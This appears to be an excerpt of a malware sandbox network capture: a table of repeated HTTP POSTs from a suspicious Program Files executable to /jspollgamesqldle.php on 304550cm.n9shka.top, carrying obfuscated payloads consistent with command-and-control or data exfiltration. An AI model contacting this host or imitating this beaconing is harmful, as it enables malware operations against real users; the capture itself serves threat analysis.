                                                          126192.168.2.46481680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:47.655071020 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:48.010149956 CEST2532OUTData Raw: 5b 5d 5c 51 5a 5f 5b 5a 5c 5a 51 56 57 5f 57 54 50 5b 5e 5d 54 5d 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: []\QZ_[Z\ZQVW_WTP[^]T]SDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&,"-]>9 ! (? 3<=\8U0);65Z(5'_378[9#G X/1
                                                          Sep 8, 2024 11:53:48.348093987 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:48.482502937 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:47 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          127192.168.2.46481780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:48.612793922 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:48.962723970 CEST2532OUTData Raw: 5b 5b 5c 53 5f 5d 5e 5a 5c 5a 51 56 57 5f 57 5c 50 59 5e 5b 54 5e 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [[\S_]^Z\ZQVW_W\PY^[T^SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%_81)>_'4?)Z/]3<=_;U0?">%(?_&7/-#G X/1
                                                          Sep 8, 2024 11:53:49.279827118 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:49.479976892 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          128192.168.2.46481880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:49.604969978 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:49.962701082 CEST2532OUTData Raw: 5e 5e 59 51 5a 53 5e 5d 5c 5a 51 56 57 52 57 54 50 5e 5e 51 54 55 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^^YQZS^]\ZQVWRWTP^^QTUSITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^,1=9+4# Y)'_$8$+S%)#.6+('$(\-;#G X/
                                                          Sep 8, 2024 11:53:50.298108101 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:50.432838917 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:49 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          129192.168.2.46481980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:50.563951969 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:50.915904999 CEST2532OUTData Raw: 5b 5a 59 56 5a 5f 5e 5d 5c 5a 51 56 57 52 57 54 50 5a 5e 51 54 5a 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [ZYVZ_^]\ZQVWRWTPZ^QTZSFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%82%*:#X#3,]*,$'?"/7<'"=>)&#X'^/+#G X/
                                                          Sep 8, 2024 11:53:51.249217987 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:51.384736061 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          130192.168.2.46482080.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:51.514620066 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:51.870373964 CEST2532OUTData Raw: 5b 5d 5c 56 5f 5e 5b 5c 5c 5a 51 56 57 5d 57 56 50 5e 5e 5f 54 58 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: []\V_^[\\ZQVW]WVP^^_TXSITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%];=(70<Z*? 0?%Z/R$95=X<6' -+#G X/9
                                                          Sep 8, 2024 11:53:52.211961985 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:52.350106001 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:51 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          131192.168.2.46482180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:52.424175978 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          132192.168.2.46482280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:52.564677000 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:52.915919065 CEST2532OUTData Raw: 5b 59 59 52 5f 5f 5b 51 5c 5a 51 56 57 5a 57 5d 50 50 5e 5e 54 5b 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [YYR__[Q\ZQVWZW]PP^^T[SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%,9) !#,*<3)];'?S%:7!X*(&3$'4[:;#G X/%
                                                          Sep 8, 2024 11:53:53.241549015 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:53.364639997 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:52 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          133192.168.2.46482380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:53.496387005 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:53.857218981 CEST2532OUTData Raw: 5e 5d 59 55 5a 59 5b 50 5c 5a 51 56 57 52 57 57 50 5e 5e 51 54 5c 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]YUZY[P\ZQVWRWWP^^QT\SFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\/1->+Y4 =,+]'=\88'6>)^? $+9#G X/
                                                          Sep 8, 2024 11:53:54.171480894 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:54.372788906 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          134192.168.2.46482480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:54.497406006 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:54.853415966 CEST2532OUTData Raw: 5b 5d 59 52 5a 5c 5e 58 5c 5a 51 56 57 59 57 51 50 5b 5e 5d 54 5e 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: []YRZ\^X\ZQVWYWQP[^]T^SHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/!=)#3$\=<,0/28 '_;"1(&0'7-#G X/)
                                                          Sep 8, 2024 11:53:55.161540985 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:55.357681036 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          135192.168.2.46482580.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:55.481784105 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:55.838398933 CEST2532OUTData Raw: 5e 5e 5c 52 5a 52 5e 5f 5c 5a 51 56 57 5c 57 57 50 50 5e 5e 54 5c 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^^\RZR^_\ZQVW\WWPP^^T\SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%8=,!0<X=/00&84U3:?6>!Y(%3^'$'9;#G X/
                                                          Sep 8, 2024 11:53:56.156924963 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:56.476120949 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z
                                                          Sep 8, 2024 11:53:56.509809971 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          136192.168.2.46482680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:56.641725063 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:56.993968964 CEST2532OUTData Raw: 5b 5b 59 53 5a 5a 5b 5f 5c 5a 51 56 57 5f 57 53 50 5a 5e 5a 54 59 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [[YSZZ[_\ZQVW_WSPZ^ZTYSCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&812=*44)(0<5/70)8".=Z?&;'4-;#G X/1
                                                          Sep 8, 2024 11:53:57.306859016 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:57.436763048 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          137192.168.2.46482780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:57.560575008 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          138192.168.2.46482880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:57.583802938 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:57.933047056 CEST1412OUTData Raw: 5b 5b 59 55 5a 5b 5e 58 5c 5a 51 56 57 59 57 54 50 58 5e 50 54 55 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [[YUZ[^X\ZQVWYWTPX^PTUSFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%[/!=>9?40Z><\$?",<0)?^6>Y+;[0/+#G X/)
                                                          Sep 8, 2024 11:53:58.277067900 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:58.410808086 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:57 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 10 30 11 3a 01 20 2e 2c 0e 2a 3f 0f 56 39 03 34 11 3e 39 39 43 3d 23 12 1c 2a 3f 31 06 3d 3b 22 1b 2b 3f 3c 59 37 31 30 02 26 25 28 5e 03 11 23 13 22 3e 39 07 2b 39 2a 58 28 21 2f 04 29 01 24 01 22 24 33 0b 20 05 2b 07 23 5e 21 0f 2b 17 3d 0f 2c 24 2e 1c 2e 0a 31 08 36 24 2d 57 0c 12 20 1b 2b 10 3b 50 23 0a 2a 05 25 3d 35 11 27 26 39 07 3e 5e 22 1c 3c 38 3a 58 25 1c 05 1d 24 03 39 5f 2b 28 2a 5d 27 00 33 59 23 3d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &0: .,*?V94>99C=#*?1=;"+?<Y710&%(^#">9+9*X(!/)$"$3 +#^!+=,$..16$-W +;P#*%=5'&9>^"<8:X%$9_+(*]'3Y#=$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          139192.168.2.46482980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:57.700756073 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:58.057395935 CEST2532OUTData Raw: 5b 5a 5c 50 5a 52 5b 5e 5c 5a 51 56 57 5a 57 52 50 5a 5e 50 54 55 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Z\PZR[^\ZQVWZWRPZ^PTUS@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%]81->98#V<=<?_'/Z/ 0;_!=^<6?_'$;.#G X/%
                                                          Sep 8, 2024 11:53:58.367378950 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:58.571671009 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:58 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          140192.168.2.46483080.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:58.708890915 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:59.056489944 CEST2532OUTData Raw: 5e 5c 5c 54 5a 52 5b 5e 5c 5a 51 56 57 5e 57 56 50 50 5e 5f 54 5e 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^\\TZR[^\ZQVW^WVPP^_T^SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&.1![>#]70Z=<?%?!]/B$$*+65[(#X$$[.;#G X/5
                                                          Sep 8, 2024 11:53:59.382931948 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:59.596944094 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:59 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          141192.168.2.46483180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:59.734606981 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
